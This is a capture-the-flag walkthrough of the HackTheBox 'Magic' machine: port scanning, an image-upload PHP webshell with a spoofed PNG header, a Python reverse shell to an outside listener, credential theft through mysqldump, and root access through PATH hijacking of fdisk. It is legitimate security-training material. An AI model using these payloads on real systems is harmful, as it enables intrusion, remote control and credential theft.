The HackTheBox platform offers a great opportunity to develop cybersecurity skills. One popular challenge is Magic, which allows pentesters to test their skills in investigating web application vulnerabilities, picking passwords, exploiting services, and escalating privileges to administrator level. In this article, we will cover all the steps involved in working with Magic, from gathering information and scanning ports with nmap and masscan, to creating exploits and escalating privileges.
The article discusses using a shell embedded in an image file, retrieving credentials via mysqldump, and escalating privileges using sysinfo.
The lab is connected via VPN. For security reasons, it is not recommended to use a work computer or device that stores sensitive data, as the work involves connecting to a private network where users with a high level of cybersecurity knowledge are present.
This machine has an IP address of 10.10.10.185, which we add to /etc/hosts.
10.10.10.185 magic.htb
First, a scan of open ports is performed. To speed up the process, masscan is used first instead of nmap. This tool scans all TCP and UDP ports through the tun0 interface at a rate of 500 packets per second.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.185 --rate=500
Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.
nmap -A magic.htb -p22,80
There are 2 ports open on the host: 22 – SSH service, and 80 – web server. As usual, we browse the Internet.
We notice the link to the authorization page. First, we try one way to bypass authorization, and find the correct one.
The page displays an image upload form. To exploit the vulnerability, PHP code is added to the file. The first four bytes of the image are left unchanged, and the desired code is appended to them. The file is saved with a double extension, since the server checks only the last extension during download, and the first during execution.
python -c "print('\x89\x50\x4e\x47' + '<?php echo system($_GET[\'cmd\']); ?>')" > 1.php.png
However, the server detects an attempted exploit and the download fails.
Let’s try to be clever and hide the code in a comment.
Despite this, after attempting to download, the server reports successful completion of the process.
The file is uploaded, but the question remains where exactly. A directory check is performed to find the location of the file. Since the site has a simple structure and there was enough time, the use of gobuster and large dictionaries was not necessary. Instead, dirb is launched to browse the available directories.
We’ve probably found the directory where the files are being downloaded. Now let’s go to our file and pass the ls command as a parameter.
And it’s done!
We pass the reverse shell as a parameter.
http://10.10.10.185/images/uploads/me.php.jpg?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.60",4321));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And we get a backconnection on port 4321.
In the working directory we find a file for working with the database.
In this file we find the user’s password.
It turns out that the found user exists in the system. However, the attempt to change the user fails.
I was able to successfully use mysqldump. When connecting using this tool, I was able to find the password.
mysqldump -u theseus -p iamkingtheseus Magic
Now we successfully change the user and get the user flag.
The sysinfo program was discovered. Searching for information about it did not yield any results regarding the ability to execute commands. Then the idea arose to check whether sysinfo was used by other programs that could potentially be replaced. To do this, the program was run under ltrace to trace library function calls and dependencies.
Thus, sysinfo starts the lshw, fdisk, and cat programs. More about the LPE vector. The operating system has an environment variable PATH that stores paths.
When a command is called, for example, ls or cd, the system sequentially searches for the corresponding files in the directories specified in the PATH variable. If you add your own directory to the beginning of PATH and place a modified version of the command there (for example, ls or cat), then this particular program will be executed.
We decided to test this principle on the fdisk command. Instead of running a reverse shell, we decided to create a script that would copy the SSH key of the root user to the corresponding file for authorization. This would allow you to connect to the root account via SSH in the same way as to a regular user.
For example, let’s call fdisk. As you can see, the legitimate fdisk is called.
Add the path to the PATH environment variable.
Now the system will look for fdisk first in /tmp/123.
Let’s run sysinfo.
The execution results in an error due to the absence of a .ssh directory in root. The script was modified to first create the necessary directory and then copy the SSH key. After re-executing sysinfo, no errors are observed in the operation of fdisk.
Next, a connection is made via SSH under the root account, after which the final flag is obtained.